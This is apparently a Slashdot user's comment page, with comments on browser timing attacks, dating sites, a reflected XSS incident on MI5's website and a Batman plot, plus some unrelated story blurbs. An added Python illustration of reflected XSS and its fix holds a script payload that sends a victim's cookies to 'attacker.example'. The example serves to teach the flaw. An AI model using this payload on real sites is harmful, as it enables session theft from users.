Comment: Pixel Perfect Timing Attacks (Score 1) 41

by crowemojo (#44457191) Attached to: Ask Slashdot: Favorite Thing Out of This Year's Black Hat?
Easily one of the best technical talks I have ever seen: how timing attacks can be used to break the same-origin policy and read the contents of a frame. This talk included demos of an attacker site loading up a target site in a frame and reading the contents to grab the CSRF token. It was awesome. http://contextis.co.uk/files/Browser_Timing_Attacks.pdf

Comment: Giant virtual bar (Score 3, Interesting) 630

by crowemojo (#38966097) Attached to: Study: Online Dating Makes People "Picky" and "Unrealistic"
In my experience, the most popular dating sites (listed as type 1 in the article, like OKCupid and Match) are like giant bars. The women are hounded from all directions by men, and the men seem to have to fight to distinguish themselves. Every good friend I know that is female and on one of these sites is constantly bombarded and things quickly devolve into shallow initial impressions. I'm willing to bet most relationships started at bars are often shaky when things get real as well.
Bug

Bethesda Criticized Over Buggy Releases 397

Posted by Soulskill
from the and-don't-kill-off-patrick-stewart-at-the-beginning dept.
SSDNINJA writes "This editorial discusses the habit of Bethesda Softworks to release broken and buggy games with plans to just fix the problems later. Following a trend of similar issues coming up in their games, the author begs gamers to stop supporting buggy games and to spread the idea that games should be finished and quality controlled before release – not weeks after."
The Internet

The Puzzle of Japanese Web Design 242

Posted by kdawson
from the how-to-pack-five-eggs dept.
I'm Not There (1956) writes "Jeffrey Zeldman brings up the interesting issue of the paradox between Japan's strong cultural preference for simplicity in design, contrasted with the complexity of Japanese websites. The post invites you to study several sites, each more crowded than the last. 'It is odd that in Japan, land of world-leading minimalism in the traditional arts and design, Web users and skilled Web design practitioners believe more is more.'"

Comment: A bit misleading ... (Score 5, Informative) 71

by crowemojo (#28880709) Attached to: MI5 Website Breached By Hacker
I see this and think the word "Hacked" gets thrown around a bit too easily. This is an example of non-persistent (also referred to as reflected) cross-site scripting. This means that in order to take advantage of it, they have to convince a target to visit their specially crafted link. To me, "Hacked" sort of implies "They got in!" or "Data was breached!" or other such bad things, and that simply isn't the case here.

So what does this type of XSS do? Mostly embarrass people, because defacement examples are posted to "look what I can do" forums (which is basically what happened). Think about the attack vector here: they have to get a victim to visit their specific URL that includes their attack. How is that done? Malicious email, posting the link to some website or forum and hoping they find it and visit, embedding the link in other sites that have been hacked or in something like a banner ad, or whatever. All of these involve the target going out of their way to visit this maliciously crafted URL. When you consider that they could still do all these things without XSS and simply host malicious code themselves, all this reflected XSS is doing is making it a bit harder for an end user to spot that this is something non-standard and dangerous.

Think of it this way: "With reflected XSS, I can send them a link, and if they visit it, I can do bad things to their computer!" But then again, you can do that without XSS too; it just isn't quite as effective. How many users are taking the time to carefully look at a link before clicking on it, checking to make sure it contains the domain name they expect and not just an IP address, or a domain name that is similar but not quite right, etc.? A user who is doing this sort of thing will more likely fall victim to this XSS attack, but most users, who don't scrutinize things at that level, were just as susceptible to a classic phishing/malicious linking attack anyway.
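The mechanism the comment above describes, as an added example that is not part of the post and has nothing to do with the MI5 site: a hypothetical search page that echoes a `q` parameter straight into its HTML (reflected XSS), the crafted link the attacker has to get a victim to follow, and the same page with the value HTML-escaped before insertion. The URL, the handler names and the payload are all constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed payload: a typical probe that ships the victim's cookies to an
# attacker-controlled host. Chosen for illustration only.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def crafted_url(base: str, term: str) -> str:
    """Build the link the attacker must persuade a victim to click.

    The payload lives entirely in the link; nothing is stored on the target
    server, which is why the attack only fires when the link is visited.
    """
    return f"{base}?{urlencode({'q': term})}"


def extract_query(url: str) -> str:
    """What the server sees after URL-decoding the 'q' parameter."""
    return parse_qs(urlparse(url).query)["q"][0]


def render_search_vulnerable(q: str) -> str:
    """Hypothetical handler that reflects the query unescaped into markup."""
    return f"<html><body><p>Results for: {q}</p></body></html>"


def render_search_fixed(q: str) -> str:
    """Same handler with the reflected value escaped for an HTML text context.

    quote=True also escapes double quotes so the value is safe inside
    attribute values, not only between tags.
    """
    return f"<html><body><p>Results for: {html.escape(q, quote=True)}</p></body></html>"


def is_reflected_raw(page: str, payload: str) -> bool:
    """True if the payload appears byte-for-byte in the response, i.e. the
    browser would parse it as markup instead of displaying it as text."""
    return payload in page


if __name__ == "__main__":
    url = crafted_url("https://target.example/search", PAYLOAD)
    q = extract_query(url)
    print("attacker link:", url)
    print("vulnerable handler reflects raw:", is_reflected_raw(render_search_vulnerable(q), PAYLOAD))
    print("fixed handler reflects raw:     ", is_reflected_raw(render_search_fixed(q), PAYLOAD))
```

The only difference between the two handlers is the `html.escape` call; the vulnerable one is what turns a link the victim would otherwise distrust into one that carries the target's own domain name.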

Comment: Re:Major Plotholes ... Spoiler Alert (Score 1) 967

by crowemojo (#24275099) Attached to: Batman Discussion
Your second plothole isn't a plothole at all. Joker was taunting them, "I was here, clearly I couldn't have done this," while making it plain that he was responsible/involved. His "What time is it?" comment is followed by something about depending on the time they would be in one place or several. It's a very clear threat that they are in danger and time is sensitive. I think you are reading more into that scene than is actually there.
